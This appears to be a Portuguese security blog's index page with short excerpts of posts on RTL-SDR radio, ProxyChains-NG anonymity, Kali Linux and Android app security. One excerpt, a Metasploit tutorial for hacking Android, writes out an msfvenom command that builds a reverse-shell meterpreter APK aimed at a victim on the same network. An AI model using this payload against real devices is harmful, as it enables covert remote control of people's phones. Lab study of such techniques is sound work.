Kali Linux

RTL-SDR: HACKEANDO RF

O QUE É RTL-SDR

O RTL-SDR é um rádio definido por software, super barato, baseado em sintonizadores de TV DVB-T com chips RTL2832U. O RTL-SDR pode ser usado como um scanner de rádio de banda larga. Pode interessar entusiastas de radioamadorismo, hackers de hardware, ou qualquer pessoas interessadas em RF.

Estou dando início a um projeto que vem martelando minha cabeça há bastante tempo. Como o objetivo final é “escovar bits” na pilha de protocolos 3G e 4G-LTE tive que estudar um pouco para não fazer um investimento em vão.

fig-01

Agora chegou a hora de botar a mão na massa, começando com um investimento modesto. No Mercado Livre, é possível comprar um a partir de R$80,00, porém comprei um basicão no https://aliexpress.com por $ 11.51. Continue lendo!

Anúncios

Tutorial ProxyChains-NG

No post Anonimato usando o Proxychains, mostrei como instalar, configurar na “mão grande“, e usar o Proxychains no Ubuntu. O Kali Linux já vem com esta ferramenta instalada; porém, para evitar a trabalheira de configuração, o ProxyChains-NG (também conhecido como proxychains4) é uma mão na roda para quem precisa de anonimato com facilidade.

proxy Continue lendo!

COMO HACKEAR O ANDROID USANDO METASPLOITS

Eu já abordei o uso de Metasploits em KALI LINUX , portanto, para um melhor entendimento, recomendo a leitura desse post; pois não serei repetitivo.

OBSERVAÇÃO:

O procedimento a seguir, foi executado em laboratório, este post é para fins educativos. Por favor, não invada a privacidade de ninguém sem permissão.

REQUISITOS:

– Kali Linux instalado em uma máquina virtual

– A VÍTIMA DEVE ESTAR NA MESMA REDE DE WIFI.

COMO HACKEAR O ANDROID USANDO METASPLOITS

  1. Abri o terminal do Kali Linux e escrevi o seguinte comando:

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 R > andro.apk Continue lendo!

Kali Linux

Kali Linux é uma distribuição de testes de penetração, frequentemente usada por profissionais, para executar testes de segurança.

Sugiro que os leitores instalem uma cópia do Kali Linux no VirtualBox ou VMware para ataques, em nível de rede, em dispositivos Android. O Kali Linux pode ser baixado do seguinte link:

https://www.kali.org/downloads/

Continue lendo!

Recursos Exigidos

Para começar, construí um arsenal de ferramentas. Se o caro leitor pretende acompanhar esta exposição, exige-se conhecimentos dos fundamentos do acesso administrativo do Android (rooting) e de como os aplicativos são criados, instalados e executados. Em seguida, abordarei os possíveis ataques aos aplicativos Android, dispositivos e outros componentes na arquitetura.

Mostrarei, a seguir, como como proteger o armazenamento de dados, um dos elementos mais importantes do desenvolvimento de aplicativos Android.

Mais adiante, fornecerei uma visão geral de vários ataques do lado do servidor e também do lado do cliente, usando testes de aplicativos estáticos e dinâmicos.

Seguidamente, apresentarei técnicas fundamentais, tipicamente usadas na criação e análise dos malwares do Android, …e criarei um, também ;>)).
Finalmente, mostrarei como se proteger dos invasores durante as operações diárias e o porquê do perigo da permissão do acesso administrativo (root) e da instalação de aplicações desconhecidas. Continue lendo!